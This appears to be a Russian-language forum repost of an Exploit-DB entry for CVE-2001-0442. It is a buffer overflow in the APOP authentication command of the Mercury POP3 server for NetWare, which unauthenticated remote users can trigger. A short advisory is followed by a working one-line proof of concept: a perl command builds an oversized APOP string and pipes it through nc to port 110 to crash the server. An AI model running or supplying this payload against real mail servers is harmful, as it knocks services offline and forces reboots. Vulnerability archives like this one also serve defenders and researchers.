- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 20792
- Проверка EDB
-
- Пройдено
- Автор
- PRZEMYSLAW FRASUNEK
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- cve-2001-0442
- Дата публикации
- 2001-04-21
Код:
source: https://www.securityfocus.com/bid/2641/info
Mercury MTA is a mail-transfer agent available for Novell NetWare and Windows NT. Novell versions of the Mercury POP3 server prior to 1.48 are vulnerable to a buffer overflow caused by inadequate string handling for the APOP authentication command.
Because the overflow occurs in an authentication command parser, unauthenticated remote users can trigger the overflow. It is unknown whether the overflow can lead to arbitrary code execution, but proof-of-concept code is available that will crash the NetWare server, requiring a reboot.
perl -e 'print "APOP " . "a"x2048 . " " . "a"x2048 . "\r\n"' | nc mercury_host 110- Источник
- www.exploit-db.com
